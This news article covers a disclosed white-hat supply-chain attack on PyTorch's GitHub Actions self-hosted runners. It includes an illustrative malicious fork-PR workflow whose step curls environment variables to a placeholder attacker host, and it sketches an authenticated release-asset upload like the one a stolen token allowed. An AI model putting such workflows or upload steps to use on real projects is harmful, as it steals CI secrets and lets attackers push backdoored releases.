Security engineer John Stawinski IV has written up a project in which he and Adnan Khan carried out a supply-chain attack on the infrastructure of the popular PyTorch deep learning framework, thankfully with benign intent.
"Security tends to lag behind adoption, and AI/ML is no exception," Stawinski writes by way of introduction to the project. "Four months ago, Adnan Khan and I exploited a critical CI/CD [Continuous Integration/Continuous Delivery] vulnerability in PyTorch, one of the world’s leading ML [Machine Learning] platforms. Used by titans like Google, Meta, Boeing, and Lockheed Martin, PyTorch is a major target for hackers and nation-states alike. Thankfully, we exploited this vulnerability before the bad guys."
The attack in question targets Microsoft's GitHub code hosting and collaboration platform, taking advantage of GitHub Actions: a system for automating the compilation, testing, and even release of software, which allows user-supplied code to execute during that process. This code can run either on GitHub's hosted infrastructure or on what is known as a "self-hosted runner", a machine the project operates itself, which comes with security warnings all too often ignored by developers, Stawinski says.
"It doesn’t help that some of GitHub's default settings are less than secure," Stawinski notes. "By default, when a self-hosted runner is attached to a repository, any of that repository's workflows can use that runner. This setting also applies to workflows from fork pull requests. Remember that anyone can submit a fork pull request to a public GitHub repository. Yes, even you. The result of these settings is that, by default, any repository contributor can execute code on the self-hosted runner by submitting a malicious PR."
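The pattern Stawinski describes can be sketched as a workflow file submitted from a fork. The snippet below is illustrative only, with hypothetical job and step names and a placeholder exfiltration address, not the pair's actual payload; it shows how a fork pull request's own workflow definition can target a repository's self-hosted runner once fork-PR workflows are allowed to run there.

```yaml
# Hypothetical malicious workflow in a fork PR; illustrative sketch only.
name: ci
on: pull_request
jobs:
  pwn:
    # Target the repository's self-hosted runner rather than a GitHub-hosted one
    runs-on: self-hosted
    steps:
      - name: Attacker-controlled step
        # Any shell command here executes on the victim's runner machine
        run: curl -d "$(env)" https://attacker.example/exfil
```

Because the workflow file arrives as part of the pull request itself, the attacker controls every step it runs.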
Analysing the PyTorch repository using Praetorian's Gato tool, Stawinski and Khan found several potentially vulnerable self-hosted runners, including some with access to secrets such as Amazon Web Services (AWS) access keys and GitHub Personal Access Tokens (PATs). By submitting a simple pull request to fix a typo in documentation, the pair became "contributors" and crafted a workflow which gave them full access to the runners, which were then used to snatch the supposedly protected secrets, the GitHub PATs among them.
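Gato automates this kind of reconnaissance, but the core check is simple enough to sketch. The Python function below is a hypothetical simplification, not Gato's actual code, and the runner labels in the example workflow are made up: it scans a workflow file's text for `runs-on` values that do not look like GitHub-hosted runner labels.

```python
import re

# GitHub-hosted runner labels look like "ubuntu-latest", "windows-2022", etc.
HOSTED = re.compile(r"^(ubuntu|windows|macos)-", re.IGNORECASE)

def self_hosted_jobs(workflow_text: str) -> list[str]:
    """Return runs-on labels in a workflow that look self-hosted.

    A crude sketch of the check tools like Gato automate: any
    `runs-on:` value that is not a known GitHub-hosted label is
    worth a closer look.
    """
    labels = re.findall(r"runs-on:\s*\[?([^\]\n]+)\]?", workflow_text)
    suspicious = []
    for label in labels:
        for part in (p.strip().strip("'\"") for p in label.split(",")):
            if part and not HOSTED.match(part):
                suspicious.append(part)
    return suspicious

# Hypothetical workflow text; the second label is a made-up example.
example = """
jobs:
  build:
    runs-on: ubuntu-latest
  bench:
    runs-on: [self-hosted, linux.gcp.a100]
"""
print(self_hosted_jobs(example))  # → ['self-hosted', 'linux.gcp.a100']
```

A real tool would also check whether fork pull requests can reach those runners, which is the setting that made the PyTorch case exploitable.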
"Using the [GitHub] token," Stawinski explains, "we could upload an asset claiming to be a pre-compiled, ready-to-use PyTorch binary and add a release note with instructions to download and run the binary. Any users that downloaded the binary would then be running our code. If the current source code assets were not pinned to the release commit, the attacker could overwrite those assets directly.
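The release-tampering step rests on GitHub's standard REST API for uploading release assets. The sketch below only constructs the request; the repository, release ID, asset name, and token are placeholders, and actually sending it would require a PAT with write access such as the one the pair stole.

```python
def build_asset_upload(owner: str, repo: str, release_id: int,
                       asset_name: str, token: str) -> tuple[str, dict]:
    """Construct the GitHub REST API request for attaching a file to a release.

    This is GitHub's documented uploads.github.com endpoint; with a token
    that has write access to the repository, any file POSTed here appears
    as an official-looking release asset.
    """
    url = (f"https://uploads.github.com/repos/{owner}/{repo}"
           f"/releases/{release_id}/assets?name={asset_name}")
    headers = {
        "Authorization": f"Bearer {token}",        # the (stolen) PAT
        "Content-Type": "application/octet-stream",
        "Accept": "application/vnd.github+json",
    }
    return url, headers

# Placeholder values for illustration only.
url, headers = build_asset_upload("pytorch", "pytorch", 1234,
                                  "torch-cp310-linux_x86_64.whl", "ghp_EXAMPLE")
print(url)
```

Nothing in the API distinguishes such an asset from one uploaded by a maintainer, which is what makes this step so dangerous for downstream users.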
"If backdooring PyTorch repository releases sounds fun, well, that is only a fraction of the impact we achieved when we looked at repository secrets." These secrets, Stawinski notes, unlocked access to more than 90 other PyTorch repositories as well as the project's Amazon Web Services (AWS) cloud systems.
"Overall, the PyTorch submission process was blah, to use a technical term. They frequently had long response times, and their fixes were questionable," Stawinski says of the process, which — eventually — netted the pair a $5,000 bug bounty payout from Facebook parent Meta, plus a ten per cent bonus as an apology over the delays.
Stawinski's full write-up is available on his website.